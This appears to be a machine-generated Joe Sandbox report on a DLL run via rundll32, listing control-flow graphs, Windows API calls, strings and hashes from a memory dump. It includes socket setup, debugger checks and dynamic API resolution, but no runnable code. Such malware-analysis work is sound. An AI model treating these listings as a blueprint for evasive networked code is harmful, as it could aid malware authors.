                          control_flow_graph 133 1001fb60-1001fba1 call 100236ce 135 1001fba3-1001fbaa 133->135 136 1001fbb1-1001fbb7 135->136 137 1001fbac call 1001fb50 135->137 139 1001fbc1-1001fbc4 136->139 140 1001fbb9-1001fbbf 136->140 137->136 141 1001fbc7-1001fc07 call 1002e804 139->141 140->141 144 1001fc09-1001fc19 141->144 145 1001fc1e-1001fc2c 141->145 144->145
                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                          Similarity
                          • API ID: _memcpy_s
                          • String ID:
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 147 1002b0bb-1002b0d3 call 10030535 150 1002b0d5 call 10023b5b 147->150 151 1002b0da-1002b0dd 147->151 150->151 153 1002b115-1002b126 call 1002ac8f 151->153 154 1002b0df-1002b0e7 151->154 163 1002b13b-1002b142 call 1003060d 153->163 164 1002b128-1002b136 call 1002af6b 153->164 155 1002b10a call 1002adac 154->155 156 1002b0e9-1002b108 call 1002aec4 154->156 162 1002b10f-1002b113 155->162 156->150 156->155 162->150 162->153 164->163
                          APIs
                          • __EH_prolog3.LIBCMT ref: 1002B0C2
                            • Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71
                          Similarity
                          • API ID: Exception@8H_prolog3Throw
                          • String ID:
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 169 10008000-1000801a call 1002e654 172 10008023-10008037 169->172 173 1000801c-10008021 169->173 175 1000804b-10008052 172->175 174 1000807b-1000807e 173->174 176 10008054-1000805c 175->176 177 1000805e-10008062 call 1002e577 175->177 176->175 180 10008067-10008070 177->180 181 10008072-10008074 180->181 182 10008076 180->182 181->174 182->174
                          APIs
                          • _malloc.LIBCMT ref: 1000800B
                            • Part of subcall function 1002E654: __FF_MSGBANNER.LIBCMT ref: 1002E677
                            • Part of subcall function 1002E654: __NMSG_WRITE.LIBCMT ref: 1002E67E
                            • Part of subcall function 1002E654: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880), ref: 1002E6CB
                          Similarity
                          • API ID: AllocateHeap_malloc
                          • String ID:
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 183 100236ce-100236dc 184 100236e2-100236ed call 1002e654 183->184 185 100236de-100236e0 183->185 188 100236f2-100236f5 184->188 186 10023707-1002370a 185->186 188->185 189 100236f7-10023704 188->189 189->186
                          APIs
                          Similarity
                          • API ID: _malloc
                          • String ID:
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 190 1002acfb-1002ad0d call 10030568 193 1002ad30-1002ad37 call 1003060d 190->193 194 1002ad0f-1002ad1e call 1002a6ab 190->194 199 1002ad20 194->199 200 1002ad25-1002ad2b call 1002a71d 194->200 202 1002ad23 199->202 200->193 202->200
                          APIs
                          • __EH_prolog3_catch.LIBCMT ref: 1002AD02
                            • Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
                            • Part of subcall function 1002A6AB: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
                            • Part of subcall function 1002A6AB: LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
                            • Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714
                          Similarity
                          • API ID: CriticalSection$Enter$H_prolog3_catchInitializeLeave
                          • String ID:
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 203 10035645-10035667 HeapCreate 204 1003566b-10035674 203->204 205 10035669-1003566a 203->205
                          APIs
                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,1002E896,00000001,?,?,?,1002EA0F,?,?,?,1004E6A8,0000000C,1002EACA), ref: 1003565A
                          Similarity
                          • API ID: CreateHeap
                          • String ID:
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Non-executed Functions

                          APIs
                          Similarity
                          • API ID: ___getlocaleinfo
                          • String ID:
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • WSAStartup.WS2_32(?,?), ref: 10001194
                          • _memset.LIBCMT ref: 100011A8
                          • htonl.WS2_32(00000000), ref: 100011C1
                          • htons.WS2_32(?), ref: 100011D5
                          • socket.WS2_32(00000002,00000002,00000000), ref: 100011EB
                          • bind.WS2_32(?,?,00000010), ref: 10001210
                          • setsockopt.WS2_32(?,0000FFFF,00001006,00000001,00000008), ref: 10001252
                          Similarity
                          • API ID: Startup_memsetbindhtonlhtonssetsockoptsocket
                          • String ID:
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • IsIconic.USER32 ref: 1001DFE3
                            • Part of subcall function 10024266: __EH_prolog3.LIBCMT ref: 1002426D
                            • Part of subcall function 10024266: BeginPaint.USER32(?,?,00000004,10022D30,?,00000058,1001E0C9), ref: 10024299
                          • SendMessageA.USER32 ref: 1001E031
                          • GetSystemMetrics.USER32 ref: 1001E039
                          • GetSystemMetrics.USER32 ref: 1001E044
                          • GetClientRect.USER32 ref: 1001E05B
                          • DrawIcon.USER32 ref: 1001E0AE
                          Similarity
                          • API ID: MetricsSystem$BeginClientDrawH_prolog3IconIconicMessagePaintRectSend
                          • String ID:
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • _strcpy_s.LIBCMT ref: 100212CD
                            • Part of subcall function 100210FF: __CxxThrowException@8.LIBCMT ref: 10023B71
                            • Part of subcall function 100210FF: __cftof.LIBCMT ref: 10023B88
                            • Part of subcall function 10030D24: __getptd_noexit.LIBCMT ref: 10030D24
                          • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 100212E5
                          • __snwprintf_s.LIBCMT ref: 1002131A
                          • LoadLibraryA.KERNEL32(?), ref: 10021355
                          Strings
                          Similarity
                          • API ID: Exception@8InfoLibraryLoadLocaleThrow__cftof__getptd_noexit__snwprintf_s_strcpy_s
                          • String ID: LOC
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 10031D3A
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 10031D4F
                          • UnhandledExceptionFilter.KERNEL32(10049478), ref: 10031D5A
                          • GetCurrentProcess.KERNEL32(C0000409), ref: 10031D76
                          • TerminateProcess.KERNEL32(00000000), ref: 10031D7D
                          Similarity
                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                          • String ID:
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Similarity
                          • API ID: Version_memset
                          • String ID:
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • __EH_prolog3_GS.LIBCMT ref: 100214D5
                          • GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,1002179C,?,?), ref: 10021505
                          • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10021519
                          • ConvertDefaultLocale.KERNEL32(?), ref: 10021555
                          • ConvertDefaultLocale.KERNEL32(?), ref: 10021563
                          • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10021580
                          • ConvertDefaultLocale.KERNEL32(?), ref: 100215AB
                          • ConvertDefaultLocale.KERNEL32(000003FF), ref: 100215B4
                          • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 100215CD
                          • EnumResourceLanguagesA.KERNEL32 ref: 100215EA
                          • ConvertDefaultLocale.KERNEL32(?), ref: 1002161D
                          • ConvertDefaultLocale.KERNEL32(00000000), ref: 10021626
                          • GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10021669
                          • _memset.LIBCMT ref: 10021689
                          Strings
                          Similarity
                          • API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
                          • String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,770D5D80,100250B0,?,?,?,?,?,?,?,10026FEC,00000000,00000002,00000028), ref: 10024F86
                          • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 10024FA2
                          • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 10024FB3
                          • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 10024FC4
                          • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 10024FD5
                          • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 10024FE6
                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 10024FF7
                          • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 10025008
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp
                          • Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp
                          • Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp
                          • Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp
                          • Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp
                          • Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp
                          • Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
                          Similarity
                          • API ID: AddressProc$HandleModule
                          • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                          • API String ID: 667068680-68207542
                          • Opcode ID: 2c2d105ab76555674e553128ad85fc5a2fe8f9f5109b4f1e6913bbfff899dba8
                          • Instruction ID: f18cf552d00ebf4573e19fd52f8b2344fe61d2491b1b7e62cf44cba2888c0d7d
                          • Opcode Fuzzy Hash: 2c2d105ab76555674e553128ad85fc5a2fe8f9f5109b4f1e6913bbfff899dba8
                          • Instruction Fuzzy Hash: 15213672D10170ABE752EF749DC886D7AF8F64C2827A1083FE302DA12AD7724540DF98
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Strings
                          Similarity
                          • API ID: Rect$Window$Copy$Long$MessageParentSend
                          • String ID: (
                          • API String ID: 808654186-3887548279
                          • Opcode ID: ffd55680436a5d28903850f20e835ec9a2371b9025f3b79a50c4d24cc647ab29
                          • Instruction ID: 79398ab63d643b80669917eeb3518c0a7ae9ea55fdc53564aac6bb8538d6af80
                          • Opcode Fuzzy Hash: ffd55680436a5d28903850f20e835ec9a2371b9025f3b79a50c4d24cc647ab29
                          • Instruction Fuzzy Hash: 08513C72900219AFDB01CBA8EE85AEEBBB9FF48350F554125F909F3251DB30ED458B64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,1004E800,0000000C,1003474B,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C), ref: 10034622
                          • __crt_waiting_on_module_handle.LIBCMT ref: 1003462D
                            • Part of subcall function 1003065C: Sleep.KERNEL32(000003E8,00000000,?,10034573,KERNEL32.DLL,?,?,10034907,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F), ref: 10030668
                            • Part of subcall function 1003065C: GetModuleHandleW.KERNEL32(00000000,?,10034573,KERNEL32.DLL,?,?,10034907,00000000,?,1002E9AC,00000000,?,?,?,1002EA0F,?), ref: 10030671
                          • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 10034656
                          • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 10034666
                          • __lock.LIBCMT ref: 10034688
                          • InterlockedIncrement.KERNEL32(?), ref: 10034695
                          • __lock.LIBCMT ref: 100346A9
                          • ___addlocaleref.LIBCMT ref: 100346C7
                          Strings
                          Similarity
                          • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                          • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                          • API String ID: 1028249917-2843748187
                          • Opcode ID: 5b83938148a6bc88c1e014cfaa9ba3fc415054042f6b227dce2f604cd513625e
                          • Instruction ID: 0d6301bb9ab871ffe84231295dfe76788f8a31cd98ef4b571f500b89faff28c9
                          • Opcode Fuzzy Hash: 5b83938148a6bc88c1e014cfaa9ba3fc415054042f6b227dce2f604cd513625e
                          • Instruction Fuzzy Hash: 1C11AF79801741AFE711CF79CD42B8ABBF0EF45311F214969E499EB2A0CB74AA40CB59
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetModuleHandleA.KERNEL32(KERNEL32), ref: 10020C68
                          • GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 10020C85
                          • GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 10020C92
                          • GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 10020C9F
                          • GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 10020CAC
                          Strings
                          Similarity
                          • API ID: AddressProc$HandleModule
                          • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                          • API String ID: 667068680-3617302793
                          • Opcode ID: dac128db901c47e6bb8252af25d8797b23f4122bed0c2a723d77acf103c536fb
                          • Instruction ID: 164c5ab3b4a161f1fd64f3c59e5fc8043f34cbc47aed943c162e41eaa6e30758
                          • Opcode Fuzzy Hash: dac128db901c47e6bb8252af25d8797b23f4122bed0c2a723d77acf103c536fb
                          • Instruction Fuzzy Hash: 621130F1C002A19BDB11DF99ADC484ABFE9F656240363427FF218D3221EB708854CE17
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • __EH_prolog3_catch.LIBCMT ref: 10023423
                          • FindResourceA.KERNEL32(?,?,00000005), ref: 10023456
                          • LoadResource.KERNEL32(?,00000000), ref: 1002345E
                            • Part of subcall function 100275EC: UnhookWindowsHookEx.USER32(?), ref: 1002761C
                          • LockResource.KERNEL32(?,00000024,1000150C,00000000,EDE0AFBE), ref: 1002346F
                          • GetDesktopWindow.USER32 ref: 100234A2
                          • IsWindowEnabled.USER32(?), ref: 100234B0
                          • EnableWindow.USER32(?,00000000), ref: 100234BF
                            • Part of subcall function 1002A492: IsWindowEnabled.USER32(?), ref: 1002A49B
                            • Part of subcall function 1002A4AD: EnableWindow.USER32(?,00000000), ref: 1002A4BE
                          • EnableWindow.USER32(?,00000001), ref: 100235A4
                          • GetActiveWindow.USER32 ref: 100235AF
                          • SetActiveWindow.USER32(?,?,00000024,1000150C,00000000,EDE0AFBE), ref: 100235BD
                          • FreeResource.KERNEL32(?,?,00000024,1000150C,00000000,EDE0AFBE), ref: 100235D9
                          Similarity
                          • API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchHookLoadLockUnhookWindows
                          • String ID:
                          • API String ID: 964565984-0
                          • Opcode ID: 9f51e5419fd464f8870fff1869e5699930f25b995303faded1736d57e07594c8
                          • Instruction ID: c961092801c59ee9409441e3dbe49a4a333b051d42b2e552560430daa244bbc0
                          • Opcode Fuzzy Hash: 9f51e5419fd464f8870fff1869e5699930f25b995303faded1736d57e07594c8
                          • Instruction Fuzzy Hash: AA51A034A00B15DFDF11DFA4E9856AEBBF0FF48711F904029E54AA21A1CB719E81CF55
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetStockObject.GDI32(00000011), ref: 1002B9C8
                          • GetStockObject.GDI32(0000000D), ref: 1002B9D0
                          • GetObjectA.GDI32(00000000,0000003C,?), ref: 1002B9DD
                          • GetDC.USER32(00000000), ref: 1002B9EC
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 1002BA00
                          • MulDiv.KERNEL32(00000000,00000048,00000000), ref: 1002BA0C
                          • ReleaseDC.USER32 ref: 1002BA18
                          Strings
                          Similarity
                          • API ID: Object$Stock$CapsDeviceRelease
                          • String ID: System
                          • API String ID: 46613423-3470857405
                          • Opcode ID: 95aa6347fd842ffca335552be3f3c7f3934e69caa990673b5ebc058802f1fbd6
                          • Instruction ID: 22c60c461008f25a8b5f8ebf610b65477afa905285395b5dac6d7a6a43a1c48b
                          • Opcode Fuzzy Hash: 95aa6347fd842ffca335552be3f3c7f3934e69caa990673b5ebc058802f1fbd6
                          • Instruction Fuzzy Hash: F611C171A01228EBEB10DBA5DD89FAE7BB8FF05781F400015FA05E61C1DB709D01CBA4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Similarity
                          • API ID: MessageSend$_strlen
                          • String ID:
                          • API String ID: 3697954797-0
                          • Opcode ID: 50909218d121ae73ae8b47ddfd2900abd0d565cb3fc4bb7cb040f620d48819e1
                          • Instruction ID: 0edfc11e8551d9ebf0957f65f3a3322fb23760369c1f09792b2f79df2d73aaf8
                          • Opcode Fuzzy Hash: 50909218d121ae73ae8b47ddfd2900abd0d565cb3fc4bb7cb040f620d48819e1
                          • Instruction Fuzzy Hash: 22413A74F00306ABE704CF94CD85FAEB7B5FB88B41F208159FA19AB291C670A941DB54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • __EH_prolog3_catch.LIBCMT ref: 1002AF72
                          • EnterCriticalSection.KERNEL32(?,00000010,1002B13B,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461), ref: 1002AF83
                          • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002AFA1
                          • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002AFD5
                          • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002B041
                          • _memset.LIBCMT ref: 1002B060
                          • TlsSetValue.KERNEL32(?,00000000), ref: 1002B071
                          • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004,100217C4,00000004,10001461,00000000), ref: 1002B092
                          Similarity
                          • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                          • String ID:
                          • API String ID: 1891723912-0
                          • Opcode ID: 26dcec1041afacb20883f8a88d8399bfa0257013ec7d92cf10d39ecfaabb8d94
                          • Instruction ID: 31172aa3a9d6c7229b9057958b552749f74c39a7ca69aeefdb4b4ffe67e485c6
                          • Opcode Fuzzy Hash: 26dcec1041afacb20883f8a88d8399bfa0257013ec7d92cf10d39ecfaabb8d94
                          • Instruction Fuzzy Hash: 2431BCB4400A16EFDB25DF64ECC5C5ABBB4FF05310BA1C529E96A97661CB30AD90CF80
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • __CxxThrowException@8.LIBCMT ref: 10001982
                          Strings
                          Similarity
                          • API ID: Exception@8Throw
                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                          • API String ID: 2005118841-1866435925
                          • Opcode ID: 51a00e0988f626f2dae953a8ada664ba94390563386f7a615b68e84484e52bf4
                          • Instruction ID: 1c38ab3b2c14ee1c247bdf225933c46791fcea5bd7c47801f16d03e79e27f587
                          • Opcode Fuzzy Hash: 51a00e0988f626f2dae953a8ada664ba94390563386f7a615b68e84484e52bf4
                          • Instruction Fuzzy Hash: 29518A34904688EEDB14DFA0CC85BDDB7B1EF45300F6081ADE5056B285CBB46E85CF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 10021E9F: GetParent.USER32(00000000), ref: 10021EF3
                            • Part of subcall function 10021E9F: GetLastActivePopup.USER32(00000000), ref: 10021F04
                            • Part of subcall function 10021E9F: IsWindowEnabled.USER32(00000000), ref: 10021F18
                            • Part of subcall function 10021E9F: EnableWindow.USER32(00000000,00000000), ref: 10021F2B
                          • EnableWindow.USER32(?,00000001), ref: 10021F9E
                          • GetWindowThreadProcessId.USER32(?,?), ref: 10021FB2
                          • GetCurrentProcessId.KERNEL32 ref: 10021FBC
                          • SendMessageA.USER32 ref: 10021FD4
                          • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1002204E
                          • EnableWindow.USER32(00000000,00000001), ref: 10022093
                          Strings
                          Similarity
                          • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                          • String ID: 0
                          • API String ID: 1877664794-4108050209
                          • Opcode ID: fa47c2bca283c1efa9c57a90baf6965e2cf2faf5ec170df8e895b8240d28c0a6
                          • Instruction ID: c7e4dcc29fd9e1fd486e00497d35318e62f13d9d594050e36cf698265b5585c7
                          • Opcode Fuzzy Hash: fa47c2bca283c1efa9c57a90baf6965e2cf2faf5ec170df8e895b8240d28c0a6
                          • Instruction Fuzzy Hash: 7B41EF75A00228ABEB21CF64DC86BDA77B8FF14750F900599FA58D7281D7B09E80CF90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GlobalLock.KERNEL32 ref: 1002104C
                          • lstrcmpA.KERNEL32(?,?), ref: 10021058
                          • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 1002106A
                          • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1002108A
                          • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10021092
                          • GlobalLock.KERNEL32 ref: 1002109C
                          • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 100210A9
                          • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 100210C1
                            • Part of subcall function 1002A801: GlobalFlags.KERNEL32(?), ref: 1002A810
                            • Part of subcall function 1002A801: GlobalUnlock.KERNEL32(?,?,?,?,10021A27,?,00000214,1000148F), ref: 1002A822
                            • Part of subcall function 1002A801: GlobalFree.KERNEL32 ref: 1002A82D
                          Similarity
                          • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                          • String ID:
                          • API String ID: 168474834-0
                          • Opcode ID: 85f582fc0fa2d760b393ed167a5d421003042f2adcf672044b7dbfb8b9eda5cc
                          • Instruction ID: 1e26f6493bbdf61cc617228eadb58d3a13350607a0778397bdab265459f41c03
                          • Opcode Fuzzy Hash: 85f582fc0fa2d760b393ed167a5d421003042f2adcf672044b7dbfb8b9eda5cc
                          • Instruction Fuzzy Hash: 6E11E079600640BBDB228BA5CD89DAFBAFDFB867407500529F605D2020DA72ED81DB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GlobalLock.KERNEL32 ref: 1002B878
                          • lstrlenA.KERNEL32(?), ref: 1002B8C3
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 1002B8DD
                          • _wcslen.LIBCMT ref: 1002B901
                          Strings
                          Similarity
                          • API ID: ByteCharGlobalLockMultiWide_wcslenlstrlen
                          • String ID: System
                          • API String ID: 4253822919-3470857405
                          • Opcode ID: d5816cacfd0a332e5282f5be394baf9a0c0f2a364455dc9baade1f500cebd3c2
                          • Instruction ID: 7b5a175680f670ca79b6c2ec9272e95e82f354ff2106dbd97111df154043a3f4
                          • Opcode Fuzzy Hash: d5816cacfd0a332e5282f5be394baf9a0c0f2a364455dc9baade1f500cebd3c2
                          • Instruction Fuzzy Hash: C8412671D00619DFDB14CFA4DC85AAEBBB9FF04310F64812AE516EB285E770AD85CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Similarity
                          • API ID: Message$Window$PeekSendUpdate$LongParent
                          • String ID:
                          • API String ID: 2853195852-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Strings
                          Similarity
                          • API ID: LongWindow$MessageSend_memset
                          • String ID: ,
                          • API String ID: 2997958587-3772416878
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetCapture.USER32 ref: 1002B279
                          • SendMessageA.USER32 ref: 1002B294
                          • GetFocus.USER32 ref: 1002B2A9
                          • SendMessageA.USER32 ref: 1002B2B7
                          • GetLastActivePopup.USER32(?), ref: 1002B2E0
                          • SendMessageA.USER32 ref: 1002B2ED
                            • Part of subcall function 1002881E: GetWindowLongA.USER32 ref: 10028844
                            • Part of subcall function 1002881E: GetParent.USER32(?), ref: 10028852
                          • SendMessageA.USER32 ref: 1002B313
                          Similarity
                          • API ID: MessageSend$ActiveCaptureFocusLastLongParentPopupWindow
                          • String ID:
                          • API String ID: 3338174999-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 1002AB28
                          • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1002AB4B
                          • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1002AB67
                          • RegCloseKey.ADVAPI32(?), ref: 1002AB77
                          • RegCloseKey.ADVAPI32(?), ref: 1002AB81
                          Strings
                          Similarity
                          • API ID: CloseCreate$Open
                          • String ID: software
                          • API String ID: 1740278721-2010147023
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • __EH_prolog3.LIBCMT ref: 10043F49
                            • Part of subcall function 1001E9D0: _strlen.LIBCMT ref: 1001E9EF
                          • std::bad_exception::bad_exception.LIBCMT ref: 10043F66
                            • Part of subcall function 10043EBB: std::runtime_error::runtime_error.LIBCPMT ref: 10043EC6
                          • __CxxThrowException@8.LIBCMT ref: 10043F74
                            • Part of subcall function 100312CD: RaiseException.KERNEL32(?,?,1004B6B4,1004F1B8,?,?,?,100203CA,1004B6B4,1004F1B8,00000000,00000000), ref: 1003130F
                          • __EH_prolog3.LIBCMT ref: 10043F81
                          • std::exception::exception.LIBCMT ref: 10043F8F
                            • Part of subcall function 1002E469: _strlen.LIBCMT ref: 1002E48E
                            • Part of subcall function 1002E469: _malloc.LIBCMT ref: 1002E497
                            • Part of subcall function 1002E469: _strcpy_s.LIBCMT ref: 1002E4AA
                          Strings
                          • invalid string position, xrefs: 10043F4E
                          Similarity
                          • API ID: H_prolog3_strlen$ExceptionException@8RaiseThrow_malloc_strcpy_sstd::bad_exception::bad_exceptionstd::exception::exceptionstd::runtime_error::runtime_error
                          • String ID: invalid string position
                          • API String ID: 4120362211-1799206989
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetSysColor.USER32(0000000F), ref: 1002A956
                          • GetSysColor.USER32(00000010), ref: 1002A95D
                          • GetSysColor.USER32(00000014), ref: 1002A964
                          • GetSysColor.USER32(00000012), ref: 1002A96B
                          • GetSysColor.USER32(00000006), ref: 1002A972
                          • GetSysColorBrush.USER32(0000000F), ref: 1002A97F
                          • GetSysColorBrush.USER32(00000006), ref: 1002A986
                          Similarity
                          • API ID: Color$Brush
                          • String ID:
                          • API String ID: 2798902688-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • __EH_prolog3_catch.LIBCMT ref: 1002326D
                          • GlobalLock.KERNEL32 ref: 10023345
                          • CreateDialogIndirectParamA.USER32(?,?,?,10022CA4,00000000), ref: 10023374
                          • DestroyWindow.USER32(00000000,?,1000150C,00000000,EDE0AFBE), ref: 100233EE
                          • GlobalUnlock.KERNEL32(?,?,1000150C,00000000,EDE0AFBE), ref: 100233FE
                          • GlobalFree.KERNEL32 ref: 10023407
                          Similarity
                          • API ID: Global$CreateDestroyDialogFreeH_prolog3_catchIndirectLockParamUnlockWindow
                          • String ID:
                          • API String ID: 3003189058-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetWindowLongA.USER32 ref: 10021ED2
                          • GetParent.USER32(00000000), ref: 10021EE0
                          • GetParent.USER32(00000000), ref: 10021EF3
                          • GetLastActivePopup.USER32(00000000), ref: 10021F04
                          • IsWindowEnabled.USER32(00000000), ref: 10021F18
                          • EnableWindow.USER32(00000000,00000000), ref: 10021F2B
                          Similarity
                          • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                          • String ID:
                          • API String ID: 670545878-0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • __CreateFrameInfo.LIBCMT ref: 10037760
                            • Part of subcall function 10030430: __getptd.LIBCMT ref: 1003043E
                            • Part of subcall function 10030430: __getptd.LIBCMT ref: 1003044C
                          • __getptd.LIBCMT ref: 1003776A
                            • Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
